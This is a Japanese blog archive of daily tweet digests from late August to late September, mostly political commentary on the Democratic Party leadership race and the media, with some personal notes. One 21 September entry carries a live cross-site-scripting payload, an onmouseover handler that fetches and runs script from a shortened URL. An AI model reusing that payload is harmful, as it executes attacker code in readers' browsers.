

09/29のツイートまとめ

tomyume

@sabakuinu 罠にかからないように気を引き締めろ、とでも言いたかったのですか?
09-29 23:30

@toriaezu_neko ? 私は以下の文言に同感と言ったのですが @satoimo5 民主の不倫男@細野豪志前幹事長代理...過去に過ちがあったとしても謝ってたちなおろうとしたし勉強もしてるし...枕詞はずしてあげたらどうです?
09-29 21:46

同感 QT @satoimo5 RT @sabakuinu 民主の不倫男@細野豪志前幹事長代理が極秘に中国を訪問しているそうでーす。 過去に過ちがあったとしても、謝って、たちなおろうとしたし、勉強もしてるし、前原派脱会してまで小沢さん支持してるし枕詞はずしてあげたらどうです?
09-29 18:31

前原氏は政治家じゃない、単なるタレントだ、と考えれば合点がいく。
09-29 17:34

@kihachin いやあ、水泳はいいですよね。
09-29 14:13

過日、不要の金ピカ仏壇も単なる廃棄物として処理されると聞いて思わずもったいない! QT @hitsuji_no_hito "2008年1月現在、日本に「地上資源」ないし「都市鉱山」として存在する金は約6800トンで、これは全世界の金の現有埋蔵量の約16パーセントにも及ぶ量である"
09-29 14:12

@DHTas ははははは。いやあ、あそこまでひどい人物だったとは、知りませんでしたね。
09-29 13:50

@kihachin 昨日のレントゲンでは原因物質が消えていましたから、後はリハビリとでもいうべきトレーニングを自分でするだけです。まあ、ぼちぼちやっていきます。
09-29 13:49

@minkanjindesu05 前原氏の選挙区ではありませんが、どうもあのタカ派的言動に溜飲を下げて支持している人がいるのでは。新自由主義者で好戦主義者で、と最悪人物だと思いますが。なんで彼がのし上がってきたんでしょうね。
09-29 13:45

肩を傷めて運動不足だったので叔母の病院まで自転車で行った。往きは毛布を、帰りは洗濯物をリュックに入れて。往きはよいよい帰りは怖いで、下り坂の往きは30分で着いたが帰りの上り坂では4、50分かかってしまった。ちょっとくたびれてお腹がすいた。
09-29 13:38

続きを読む


09/28のツイートまとめ

tomyume

「ニュースの深層」。司会上杉さんに対してゲストは吹浦忠正とかいう方。「尖閣諸島は日米安全保障条約の適用範囲」とクリントン国務長官に言わせたのは前原外相の大金星だ、というこの吹浦氏。メディアの前原応援団はこの調子でやっていくのだろうか。
09-28 20:59

それにしても「私が辞めさせる」って、すごい言葉だな、と思う。烈女か猛女か知らないけれど、やっぱり勘違いしてる。
09-28 19:13

「もう少しやってダメなら私が辞めさせる」という代表選最中の菅信子氏の発言があったけれど、今がその時じゃないのかな。
09-28 19:09

現総理菅氏は、能力・人格ともに全くの期待はずれということがこの4ヶ月でよく分かった。前原氏は偽メール事件以来まったく期待していなかった。あれだけの間違いを犯しておきながら鳩山内閣で国交相についたときはびっくり。その後も今回も前原氏は期待通り?に間違い連発。なぜ重用されるのか不可解
09-28 17:00

09/27のツイートまとめ

tomyume

@rolling_bean なかなか通じないですよね、言葉が強ければ反発されるし。こちらはイライラしながら、ぐっと我慢して時と言い回しを考えたりね。でも、ひとことチラッと言うのもいいかも。でも、自分の心と体をお大事に、ね。
09-27 22:06

見ました! QT @ kihachin 知り合いの方の顔が多く見えます(私の写真も…) #miyashita RT @kuronekoroku http://bit.ly/bQ8HXt 「宮下公園を救おう!手作りサウンドデモ」(東京・渋谷、09-26)写真を掲載!
09-27 22:01

@marikoshark うんうん。「陸を守る」「海水を浄化する」「観光」というたった3点から考えただけだものね。それにしてもこの数字はどうやって計算したのかしら。
09-27 14:27

力が抜ける。。QT @newsworkerこんな話が。「小沢“金庫番”石川議員から押収証拠PCウイルス感染」(zakzak) http://bit.ly/cgDcDq
09-27 14:19

沖縄の珊瑚礁の値段、1年間で]3,000億円、という計算になるとか。「陸を守る」「海水を浄化する」「観光」の3種の効果から算出されたそうだ。一度失われたら損出は計り知れないだろう、と思うと数字で出すことに抵抗がある。が1年間でこれだけだもの。未来にわたっては無限ということ?
09-27 13:53

09/26のツイートまとめ

tomyume

なるほど QT @zebra_masa 前原くんが強調してた「日米安保第5条」。専門家から見れば何も言っていないのと、少なくとも前原くんが考えているような意味は何もない。だって、「共通の危険に対処」といったって何が対処か何も規定がないんだから。
09-26 20:03

夫婦で毎日政治談義をしているらしいけど、いったい何の話しでしょう QT @h_hirano 菅首相が国連演説で漢字を読み違えたが、それ以外にもいろいろある。マクロ経済をマイクロ経済、サミットはG8なのにG7、エマージング・カントリー(新興国)のことをエマージェンシー・カンパニー
09-26 19:54

09/25のツイートまとめ

tomyume

話には聞いていたけれど、菅総理の国連演説会場の状況、ここまで酷いとは知らなかった http://eritokyo.jp/independent/aoyama-col33001.htm
09-25 23:59

ちょっと留守していたら、こんな展開に。中国がイギリスから仕掛けられ、賠償までふんだくられたアヘン戦争まで思い出してしまった。 @Manforstorm中国、船長拘束につき謝罪と賠償を要求 http://bit.ly/b9jFDa 笑いを通り越して、恐怖すら覚える。
09-25 12:56

09/24のツイートまとめ

tomyume

太刀魚は刺身が美味しい QT @yurikalin それは美味しい~! RT @jubi5 太刀魚の唐揚げ 量が少ないので、200円引き(笑) http://twitpic.com/2rg4kj
09-24 20:43

福島さん、政権離脱するときも田原総一朗に相談するとか、どこか抜けてるというか、政治家として持つべきセンスがないですね QT @28SOBA NHKニュース、福島瑞穂「検察(沖縄地検)の判断だから尊重する」に目が点。むしろ仙谷が指示してなければ政権としての判断ゼロ、政治不在になる
09-24 20:16

勘違いも甚だしい。「総理という選択肢も、私の中では否定していません」だって@kikko_no_blog こんな時に蓮舫大臣は国会議事堂でファッション誌のモデルですか→ http://bit.ly/cg99Pw
09-24 20:04

初めてのおつかい、って確かに。菅、前原、その他。
09-24 16:48

僕の留守中によろしくお願いします、と言った可能性だって考えられる @DHTas 仙石さんは、前原さんがアメリカにいる内にやっちゃったのかな?前原外交、面目ないね。
09-24 16:10

 メール事件から全然進歩していない @DHTas 中国は試している。勝算がないのに突っ込んだ前原大臣(国交相⇒外相)は、恥をかいただけじゃないか?
09-24 15:11

ははははは @agencyboss >長妻さん。多分、菅政権になってほっとしてるんでしょうな。
09-24 13:48

代表選前、9月までの服しか(官邸に)持ってきてないとか、小沢さん大好きよ、とか、好きなこと言って拍手されていた菅信子氏。役者ですねぇ。インタビューでどんな答えが求められているかを察知して、それ相応に仮面をつけてでも応じることができる役者なんでしょうね。
09-24 10:13

そうなんですか。大拍手で厚労省職員に迎えられたのはあたりまえですが、同じ厚労省職員は長妻さん大臣着任のときは拍手しなかったんですよね QT @agencyboss >村木厚子女史が復職を果たした。しかし、「障害者自立支援法」の立役者だった彼女の事
09-24 09:42

09/23のツイートまとめ

tomyume

@DHTas 菅さんのスピーチライターはどなたなんでしょうかね。一説には、信子夫人なんてありますが。
09-23 10:53

09/22のツイートまとめ

tomyume

うんうん。卑近な例ですが、イギリスのガーデニングの本を読んでいたとき、1mの深さで土を入れ替えることがどれだけ非現実的で大変なことか力説してあったのを思い出しました QT @rolling_bean野末さん:地盤面から2mの土をどかすというがどういうことか。 40haある。
09-22 21:34

デビッド・フラムって政治家かと思ったらジャーナリストでした。G・ブッシュのスピーチライターのひとりだったみたい。50だからまだまだ悪いことしそう QT @hanayuu〔史料〕米政界の一部「日本を核武装させて中国や北朝鮮と戦わせろ」 | http://bit.ly/ambYWx
09-22 19:50

@pointscale なるほど。とてもよく分かりました。ありがとうございました。
09-22 16:45

@pointscale 司法の世界も、普通の人の想像を絶するところにあります。
09-22 16:35

@pointscale お金に換えるという行為そのものが収賄罪にあたるという判決ですか? 土地に限らずいろいろな場面でお金に換えることがありえますよね。そのどれが違法になるか、線引きが困難。これも政治資金規正法みたいなもので、恣意的捜査が可能、ということですね。
09-22 16:34

@halnak 私も全然見てませんがJcastニュースにありました。だから「~らしい」としました。あの顔、朝でも昼でも夜でも見たくないですよね。
09-22 16:26

悪名高い朝ズバッ!で、みの氏が例のごとく「何のためにこんなことを」とか「何をもって『エース』と言われたのか」とか喚いたらしい。あなたにそんなこと言える資格あるか? と思ってしまった。
09-22 16:13

@pointscale 「賄賂額は前代未聞の『0円』」って、私には無罪に見えますが、どこがどうなって有罪になるのですか。
09-22 15:54

@Goodbye_mgr「大林検事総長の首を飛ばせるために、このリークが行われたとも感じた」と同じ感想持ちました。狡猾な人は他人を利用し尽くしますから。内閣が倒れるかもしれない、というツィートを見ましたが、仙谷氏の「肉を切らせて骨を断つ」作戦かもしれない。
09-22 15:48

@nxhrog 新自由主義との親和性はどうだか知りませんが、以前調べたところによると外交的には凌雲会の中でもとりわけタカ派ですよ。耐震偽装問題でスターになったけれど、あんまり歓迎すべき政治信条の持ち主とは思えません。
09-22 13:47

続きを読む

09/21のツイートまとめ

tomyume

@yurikalin 清少納言が枕草子で梨の花を愛でてますよね。
09-21 23:16

画面がおかしくなつてitouchから。どうなってるのかな!
09-21 21:35

http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/
09-21 21:20

ここにきて私のTLは民主党議員が湧いたように登場してきた。フォローしてない人の方が多い。で、この人菅支持だったね、とか、つい頭に上ってくる。
09-21 17:04

@rolling_bean 私の周りにもいるんですよ、良識派。小沢さんを舌打ちして馬鹿にしたから、あれは謀略だよ、と言っておきました。テレビのニュースでもあれからちょっと気をつけて見てくれていたらいいのですが。今度会ったら代表選に絡めて話をしよう。
09-21 09:13

政治は汚いもの、と話題にすることさえ憚るような心性もそこに重なるかも。
09-21 08:40

「政治とカネ」の問題を「クリーンな政治」という幻想(共同)にした層=良識派市民は別の国民意識や意思を排除し、抑圧する検察や大手メディアの支持基盤になる、と日刊ベリタで三上治氏。http://bit.ly/aqaT36 良識派市民の共同幻想って、分かるなあ
09-21 08:38

@rolling_bean 病院へ行く前に、病院も診療内容も契約した保険がカバーしているか調べないといけないしね。保険会社からの書類に返事を書いてOKしてもらって初めて保険が使える。自費診療は目が回るほど高くて一般人はとても負担できない。歯医者も1年間の保険使用料上限が決まってる
09-21 00:01

09/20のツイートまとめ

tomyume

@mr_absentia 分かって言ってるんだと思います。原理主義者と言われるけれど、どうなんでしょうね。少なくともこの発言からは原理・原則を大切にする人とは思えない。原理主義者のように演じているのかも。
09-20 20:53

09/19のツイートまとめ

tomyume

「有事」という言葉を聞くたび、軍需産業=軍産複合体が大きくなりすぎたアメリカを思い起こす。大恐慌に苦しむアメリカは、結局、戦争景気で立ち直ったのよね。その記憶がアメリカという国に刻み込まれたのかな。まるで麻薬に蝕まれるみたいだな。
09-19 13:43

デフレ、デフレというけれど、日常よく買う食料品など、値上がりしたままのものがけっこうある。デフレは世の中に出回るお金が少ないことだし、物価そのものとはちょっと違うかな? と、乏しい知識を総動員。豆類・粉類は値上がったまま下がらない。値段は変わらなくても内容量が減ってる。
09-19 13:34

今朝、ご飯の支度をしながら消費税がたとえば25%になったときのことを考えてしまった。125円、1250円、12,500円、125,000円、1250,000円……ダメだ、とてもじゃないがダメだ。
09-19 13:27

車のエンジンをかけたら流れてきた声は石破茂氏。沖縄の海兵隊は台湾有事の際に必要なんだ、みたいなことを言ってた。「まだはびこっている海兵隊ヘリ部隊が台湾有事の『即応部隊』というデタラメ 」http://bit.ly/a73EaY を読んだら石破さんはなんて言うかしら?
09-19 13:22

@rankeys 先日ひょいっと思いだして、ぶいっちゃんはしないのかな? と思ったところです。
09-19 13:12

09/18のツイートまとめ

tomyume

@Aiminmin 楽しみ♪
09-18 21:59

@Aiminmin えっ、どうやって折るの?
09-18 19:48

@yayoiumezawa 牧野 聖修先生とか渡辺周先生とか、やよいさんとこはすごい人たちがそろってますね。
09-18 19:06

@rankeys あれっ、ぶいっちゃん、お久しぶりです。
09-18 15:11

@noiehoie さんの菅直人の息子とゆかいな仲間たちの話を興味深く読んだ。なるほど。SFCって、恥ずかしながら初めて知りました。開祖・福沢諭吉がもっとも軽蔑する人の有り様じゃないかな。
09-18 15:03

09/17のツイートまとめ

tomyume

RT @shomeitv 「公平な放送を!」 - 署名活動するなら『署名TV』 http://bit.ly/9AHn4C
09-17 22:49

藤原新也さんが、小沢バッシングを報じた週刊文春、新潮を「出歯亀マスコミ」と呼んでた。http://bit.ly/3uO0ZT 思わず笑った。ピーピングトムというのもいたね。
09-17 22:18

「代表選を示唆する辻元事件」http://bit.ly/cLtAnq森永卓郎さんの話が面白い。やっぱり疑問。「なぜ前原・野田グループは自らの思想・政策と相容れない(と思われる)昨年の総選挙のマニフェストを容認したのか」と。権力掌握のため周到に準備された作戦の一環?なんでもありか。
09-17 21:15

なるほど、ポストに釣られたってこういうことか、と納得。
09-17 19:54

ちょっと年配の人と話をすると、親や兄弟、親戚、友人の誰かが結核で亡くなっていることがよくある。そういう当人も結核に感染して治った形跡があると検査で言われた、ということも多い。ほんとに日本は貧しかったのだろう。食生活も貧しかった。格差社会の側面のひとつかな。
09-17 16:27

機密費とか色々、高尚な目的が謳われていても、結局こういうことになるという見本 QT @officematsunaga: 未確認情報、今回、官房機密費からひきだされた金額は、「1億単位で10回」。これも未確認だが、「一人あたり500万円が、最後に1000万円と推察」(小沢G秘書推察
09-17 15:11

@biwawa 病院から? 家族から?って、分からないですよね。でも、色々あるところですから、私は病院側をつい疑ってしまいます。で、白癬菌でぼろぼろになった爪をどうにかしてあげたい、という気持ち、分かりますよね。
09-17 08:46

09/16のツイートまとめ

tomyume

@rolling_bean 同感。
09-16 22:05

@rolling_bean 世の中が妙な方向に動き出し始めましたね。不気味。癌が増殖していくイメージです。
09-16 20:18

37年前の9月1日は米国支援のピノチェト軍がクーデターを起こした日か。民主的に選出されたチリ大統領のサルバドール・アジェンデが大統領官邸で死亡し、ピノチェトが実権を握った日。5年前の9月11日の日本は小泉郵政選挙。14日の民主党代表選挙も郵政選挙以上に記憶に残りそうだ。
09-16 16:57

親世代の7割以上が財産は子どもに残さない代わりに、老後のことは子どもに頼らない、と回答し、子ども世代の7割弱が親は老後の問題を自分で解決しろ、といってるみたい。それって親が元気なうちだけ。高齢者のサポートって、そんなものじゃない。日常生活で起こる一つ一つの問題は想像以上。
09-16 11:32

えええっ、そんなこと? 可能性はありますよね QT @rokubunsoその「無効票」はおそらく機械読み取りと思う。つまり「小沢票」を「バグ」として認識するよう読取り機械に「細工」していたんでしょう。RT @takuyakaneyasu 代表三割が無投票は信じられません。
09-16 09:04

菅伸子さんが元鳥取県知人片山吉博を総務大臣に押しているとか。へえ、あの方は国際情勢の厳しい中、夫とともに嬉々として軽井沢に夏休みを取りに行ったあたりから全然信用していません。
09-16 08:54

09/15のツイートまとめ

tomyume

@rolling_bean 機密費のことは野中氏、安保のことはアーミテージ氏と、その筋にレクチャーしてもらうのね。この方の目を見ると、狸どころかマムシだと思う。
09-15 21:13

昨晩我が家の玄関先にマムシの子?が出現した。今朝になってご近所の蛇に強いおばさまに溝に捨てた死骸を見てもらった。たしかに、マムシの模様だね、との言葉。我が家はちょっとしたマムシ騒動だ(私だけだけど)。小泉純一郎氏はハ虫類の顔と思っていたけど、仙谷由人氏はマムシの顔だ。
09-15 19:51

biwawaさんとこの方の話をしたばかりだった。安保利権 QT @rolling_bean?(・_・;? RT @sedzir: うあぁ。 RT @sharkbaite522 @bilderberg54: RT @Jiji_newsRSS: アーミテージ氏と会談=仙谷官房長官
09-15 19:45

@osamu9912 なんですか、筑波の大学教授のところで保管って。結局、現政権・現執行部の好きにされた、やりたい放題、いうことですか。
09-15 15:36

55年体制の社会党を「腐ったうどん粉」と荒畑寒村さんが評した。菅民主党の腐臭もときどきチラチラと漂ってくる。これからどうなるんだろうと、やはり昨日と同じ言葉が出る。
09-15 14:47

「フロリダされた」って。うん、分かる QT @bilderberg54 34万の党員サポーター票。実際は、23万の有効投票。十万も棄権がでるか?開票センターか茨城の保管所で少なくとも数万票はフロリダされた可能性がある。地方議員票と比率を揃える数字の操作があったと私は推定する。
09-15 13:28

@biwawa 末松氏といえば、http://bit.ly/a9YqX7 にあるように、額賀、久間氏らとともにアーミテージ氏も加わった安保利権の仲間でしょう。
09-15 10:24

昨日から「左翼」「粛正」等々の言葉が脳内でリフレインしている。「左翼右翼」の語はフランス革命時の国民議会からきた。ロベスピエールの山岳党は左翼で、恐怖政治をしいた。理想や理念を掲げてそれがどんどん先鋭化するうち、一番大切な根っこの部分を忘れ、排除の論理がすべてに優先、ということ?
09-15 09:53

09/14のツイートまとめ

tomyume

フルキャスト http://bit.ly/96URl0
09-14 21:53

なるほど、そういうこと? QT @kamitori ハガキは丸見え、捨てられたのでしょう。 @hatakezo 党員・サポーター票。有権者342,493人なのに投票数229,030票!投票率が66%?残りの34%は投票しなかったのか?
09-14 19:31

@mr_absentia 混沌としてきた、というならまだしも、この3ヶ月の路線強硬、なんてことになったら……
09-14 17:10

@mr_absentia 同感。で、これからの政治はどうなっていくのでしょ。「塞翁が馬」という気持ちで気を取り直して、なお一層しっかり見ていきたいと思うけど、見たくない顔がまたのさばるのかな。
09-14 16:40

@mr_absentia : ああ、見させたもらったばかりじゃなくて、これからも見せられるんだ。。
09-14 16:11

@mr_absentia それにしても菅直人はまったくの期待はずれだったのがこの数ヶ月でよく分かりましたね。そしてあの仙谷氏の陰険・陰湿さ……まあ、いろいろ見させてもらいました。
09-14 16:09

@kihachin あらためて、政治後進国を痛感
09-14 16:03

@kihachin えええ!? まさか、といいたいけど。あり得るかも……
09-14 16:00

菅とか仙谷とか、前原とか玄葉とか、小宮山とか、いろいろ、見たくないのよね、あの顔。
09-14 15:55

ううう。。民主党にはがっかり。
09-14 15:39

09/13のツイートまとめ

tomyume

で、安住淳選対本部長が川上みつえさんへ提供しようとしたのは機密費? 元はといえば税金。他人の金で人の頬を叩くようなやり方は汚すぎる。「クリーン」の内訳はこんなところか。
09-13 20:54

想像していたよりも情けない買収文句。馬鹿にしてるね、女性を QT @kakamimitsue 8月25日、『生活困ってるでしょ?300万振り込んであげるから好きなもの買いなさい』BY安住淳選対本部長。『結構です。』BY ME。
09-13 20:46

ほとんどヒステリー状態ですね QT @tetsumura (小沢嫌いここに極まれり)ポスト(小沢一郎悪魔が来たりてホラを吹く)文芸春秋、とか、中吊り広告見ていると頭痛くなった。
09-13 10:15

09/12のツイートまとめ

tomyume

肩の痛みでニュースに注意を向けられなかったが、それでもNHKが村木さんの裁判をかなり取り上げていたのは気づいた。で、あのねつ造捜査の仕掛け人、飯島勲氏のことはどうなったの? 一石何長も狙ってやったのでしょうが、みごとに隠されてますね。それに小泉純一郎氏のことも。二人は同じ穴の狢。
09-12 12:22

09/11のツイートまとめ

tomyume

肩の痛みで眠れず次回まで日数はあったが我慢できずに病院へ。今度は注射で石灰を散らした。ふー。左手しか使えない。キーボードも左手だけで一つ一つ打つ。もう11日。代表選本番、すぐですね。
09-11 13:06

09/10のツイートまとめ

tomyume

肩の痛みでちょっとめそめそしてます。あああ。でも、村木さんの無罪判決良かったですね。
09-10 20:38

09/09のツイートまとめ

tomyume

ゴミ箱をのぞき込んで民の生活を心配する東条英機のパフォーマンスを喧伝したのもメディアでしたね QT @cookiedowntown ナチス・ヒットラーの出現も、そしてわが国の東条ファシズム体制もこのようにして、戦前のメディアによってつくられたもの
09-09 13:49

亀井金融相当時の中小・零細企業を対象にした債務の返済猶予制度で助かったものの、仕事が来ない、新しい融資が受けられないで、月初めにもらっていた知り合いの給料は月末にならないともらえないらしい。それでなくとも少ない給料。言葉がない。
09-09 13:31

菅首相、一夜漬けで一生懸命に点取り。「放置を反省」して成人T細胞白血病ATL対策を表明したらしい。母子感染保房のために全妊婦抗体検査を来年度から全国一律、公費負担で行うって。もちろんこれは大切なことだけど、あまりに見え透いた人気取りパフォーマンス。
09-09 13:23

09/08のツイートまとめ

tomyume

在沖米海兵隊のグアム移転の費用の追加負担は国際協力銀行から融資させるとか。何それ? 日本輸出入銀行と海外経済協力基金とが統合した全額政府出資の特殊銀行だって。米軍への融資は完全に目的外、いや目的に反するものでしょ http://bit.ly/bFY3yz
09-08 23:33

悪魔の死者・仙谷由人かQT @yujing7鈴木宗男の「上告棄却」決定は押尾学の公判の合間を狙った見事なタイミング。あすのスポーツ紙やワイドショーは…。悪魔の使者・仙石由人がついに馬脚を露わした。とにかく無能な総理・菅直人ほど思い通りになる。仙石の次つぎなる狙いは当然、小沢だろう
09-08 19:47

こうした金融関係のややこしい手続きは相続人本人でも大変。ましてや我が家のように遺言執行人という代理人は七面倒くさいことをさせられる。遺言書その他の身分を証明するものを持っていっても、この証券会社のように、あくまでも“自署”を要求したりする。その態度は慇懃無礼どころか「横柄無礼」だ
09-08 19:16

叔父が亡くなりもう49日だというのに相続手続きがまだ終わらない。大した財産でもないのに。今日は証券会社員が二人も直々に叔母の入院先までやってきて、自署しろと何枚か書類を置いていった。叔母はリウマチで変形した手で、おまけに座ることも辛い体で何カ所もひたすら記入し続けなければならない
09-08 19:12

09/07のツイートまとめ

tomyume

@aobadai3 どうなんでしょうね、私にも分かりません。
09-07 14:12

昨晩からの肩の痛みで病院へ。炎症が起きていた。「見た目は若いけどそれ相応の歳なんだから無理したらいけんよ。お大事に」と、入院中の叔母に言われてしまった。しばらくチェロが弾けない(涙)。
09-07 14:10

09/06のツイートまとめ

tomyume

岩本司は小沢推薦人の一人 QT @aobadai3 三井辨雄、小平忠正、高山智司、松原仁、鷲尾英一郎、菊田真紀子、牧義夫、伴野豊、古本伸一郎、中井洽、川端達夫、三日月大造、高木義明、山根隆治、島田智哉子、加賀谷健、平田健二、木俣佳丈、 榛葉賀津也、岩本司らの名がありました
09-06 21:37

同感。民社党創立者西尾末広の怪しい行動は荒畑寒村さんもたびたび言及。民社党はアメリカが作らせたとも QT @SukiyakiSong 小沢シンパの方々はこの旧民社系Gの支持をあてにしないほうがよい。旧民社党Gこそが民主党、ひいては民主主義の癌なのです。
09-06 18:36

読売オンラインが、民主党代表選の投票結果ページを削除したみたいですね。メディアの“官房機密費たかり”体質は変わりないみたい。近頃のメディアの酷さに、さすがの私も憤怒。
09-06 13:18

なぜか晒したくなったコメント QT @nagashima21 民主党代表選挙についての岡田外相のコメント「小沢さんに対してというより、小沢さんに『出てください』と言っている人たちに対して、果たして民主党の立党の原点にかえった時にどうなのかなという感じでみている」はじつに正鵠を射て
09-06 11:52

はなゆーさんところに、昨日の梅田の熱狂が。http://alcyone.seesaa.net/article/161696946.html
09-06 11:03

@2t6 お大事に。誰でも苦しいとき、大変なときがあります。
09-06 10:51

@Miepong 「労働運動家の地位の変化によるブルジョア化」って、昔からずっと言われ続けてきました。労働組合も、当然、御用組合化します。大企業は民社党系が多かったように記憶。その傾向が大。でも共産党系の組合が社会党系組合員の弾圧に手を貸したり、その逆もあったり、と色々。
09-06 10:46

民主党代表選。新宿西口、大阪梅田の熱狂を知ると、菅直人氏はピエロに見える。
09-06 00:12

09/05のツイートまとめ

tomyume

小沢一郎氏が相手になると、どうしてそんなに理性をなくすのか、本当に不思議 RT @iwakamiyasumi: 座布団一枚!RT @arudebaran60y 記者クラブ  小沢叩きの 自己弁護 社員食わすで 精一杯で RT http://bit.ly/9ftpUz
09-05 12:31

NHK日曜討論、小沢・菅のお二人。司会が先に小沢さんにふるので、菅氏はうまく言い逃れをしている。で、菅氏が小沢氏を見つめる目がちょっと不気味。
09-05 09:40

09/04のツイートまとめ

tomyume

@suzumebachi ふふふ、ありがとうございます。現在完了か。ここ2、3日、叔母の代わりに遠方からの客を案内したり接待したりして、今し方、無事完了。ほんと、一区切りですね。
09-04 21:47

@kihachin 東京都もトップがおかしいといろいろおかしなことがありますね。私はこれから叔父の49日の法要に行ってきます。叔母が入院中ですから、我が家が代わって主宰します。
09-04 09:15

09/03のツイートまとめ

tomyume

@biwawa へぇ。当時の大学生は貧乏で、テレビなんか持ってなくて、浅野温子のタマミの母なんて、知らないなあ。「タマミ」で、盛り上がっていた10代の終わりあたりでした。
09-03 13:55

@biwawa ええ? 40何年も前の楳図かずおのまんが。タイトルはとっくの昔に忘れましたが、「タマミ」の名だけは覚えてます。怖かったですよね。学生寮で友人と怖いもの見たさで回し読みして騒いでました。
09-03 10:17

09/02のツイートまとめ

tomyume

馬淵澄夫氏「大きくは経済政策、政治改革、行財政改革、税制の抜本改革について、具体的な施策の深化を示している」のが「菅候補」って言い回し、どこかで聞いた。「クリーン」の次はこれで来るのかな。
09-02 16:20

時々不思議に思ったこと。女傑のように言われる菅夫人。まあ、ホテルでの高級ディナーはファーストレディー生活を満喫しているとしても、世界が大きく動いているときによく軽井沢まで夫婦で行ったものだ、どういう神経だ。政治が大好きと言われてるけど、単に闘争心が旺盛なだけじゃないのか、と。
09-02 12:09

@kappaman 夜中12時前のニュースでは菅→小沢の順になって、小沢さんは、党幹事長だったから政策にはタッチしてないと、明確に反論してました。NHKだったと思うけど。でも夜中にこそっと流すのはおかしいですね。
09-02 01:19

09/01のツイートまとめ

tomyume

@higevision そうなんですか。いろいろな問題でいろんな人がそれぞれ立ち位置が違うけど、茂木さんは現在アメリカに対してどういう立場なんでしょうかね。
09-01 22:42

@rokubun 酷いですね。ナチス・ドイツに占領されたポーランドの町で、ユダヤ人男性は裸にされてラビを頂点にした人間ピラミッドを作らされて力尽き、あるいは誘惑に勝てるか、ラビは酒池肉林の中に放り込まれた。それほどナチの憎悪と嘲笑をあびたラビ。今度はパレスチナ人へ憎悪を向けるのか
09-01 22:37

ネットニュースを見ないし、あまり信用していない家人が、「小沢が代表になったらおもしろいなあ」「菅はどうせ負けるくせに、なに強がりいってんだ」。
09-01 18:19

@biwawa へえ、北大の山口二郎教授って、そんな人?
09-01 15:24

クリーン、クリーンってうるさいですね QT @ tetujiisan しかし、菅陣営の政策要旨いやらしいな。記者に質問させようとしているんだろ。くせの悪い奴らだ。菅氏の政見要旨 http://bit.ly/bAq6ld
09-01 14:10

08/31のツイートまとめ

tomyume

まとまっていたのは分かるけど、あらためて言われると、やっぱり! QT @keiichiroasari 日テレ別記者「あんま苛めないでよ、どこの局も回避でまとまっていたんだから。アイス食べる?」まとまってたって、おいおい・・・
08-31 18:15

仙谷官房長官、小宮山洋子財務委員長の名前がないのはどうしてなんでしょうかね QT @SukiyakiSong 首相の元に“主戦派”続々終結 枝野▽阿久津▽渡部恒三▽岡田▽長妻▽蓮舫▽安住▽鉢呂▽北沢▽寺田▽石井一▽岡崎トミ子▽土肥▽前原▽野田▽玄葉
08-31 16:20

川村晃司氏の話を聞こうと思ってTVをつけると、もう終わっていた。TBSは松田 喬和、大谷昭宏の二人があうんの呼吸でやってる。10%台の低支持率では政権末期状態、たとえ総理になっても何もできないみたいな。大谷氏が二枚舌と言われているのはこんなところか。他のタレント達は頷くばかり……
08-31 12:42

それにしても、仙谷官房長官の政治資金問題が、なぜ朝日に載ったのか? 昨日から不思議に思っているけれど、分からない。
08-31 12:16

@yayoiumezawa けっこう上等の鉄瓶を持っていますが、ガス火では強すぎて炭火でないといけません。お湯を残したまま冷めると錆が出ます。火鉢に炭をおこして井戸水を鉄瓶に入れて湧かしお茶を入れるの、ほんと美味しいですよ。でも、以上のような理由で、冬季限定です。
08-31 10:12

みごとな蜘蛛の巣にびっくり http://twitpic.com/2jstp3
08-31 09:06

金慶珠氏の専門から考えると、日本のメディア界とその動きも、メディア自身がスピンドクターになりがちなことも、あるいいはスピンドクターに乗りがちなことも分かっているだろうに。
08-31 07:28

これは再放送で、初回放送は昨日の8時過ぎ。笹木氏がマニフェストの原点に返れというのが小沢さん、というと「朝日新聞の報道によると」と言いながら、金慶珠氏は小沢さんが財源についても語っていない、と説明。この金氏、「社会言語学とメディア論」が専門とか。ステレオタイプの小沢批判だな、
08-31 07:16

朝から、朝日ニュースターもひどいな。ニュースの真相の金慶珠氏、東海大の准教授らしいけど「これまでの発言などから考えると、政策を語っているのは菅さん。小沢さんがこのまま黙って代表に座ることになってしまうことを危惧している」みたいなことを言ってる。対する民主党議員は笹木竜三、藤末健三
08-31 06:57

えっ、そんなことがあるんですか! QT @nobukimiho 墨田区が許可した業者以外のアルミ缶収集に罰金を課す条例を10月1日から施行するらしい。野宿しながら細々とアルミ缶集める仕事してる人に、死ね、という条例。醜悪なスカイツリー建てるお金とアルミ缶集めでみんなが生きていく
08-31 00:44

メールフォーム

名前:
メール:
件名:
本文:

フリーエリア

なかのひと
twitter
    follow me on Twitter
    カレンダー

    tokura_203-52.gif

    最近の記事
    カレンダー
    08 | 2010/09 | 10
    - - - 1 2 3 4
    5 6 7 8 9 10 11
    12 13 14 15 16 17 18
    19 20 21 22 23 24 25
    26 27 28 29 30 - -
    最近のトラックバック

    smilelink_203-52.gif

    月別アーカイブ
    カテゴリー

    ブロとも申請フォーム

    この人とブロともになる

    プロフィール

    Author:とむ丸

    ブログ内検索
    RSSフィード
    リンク
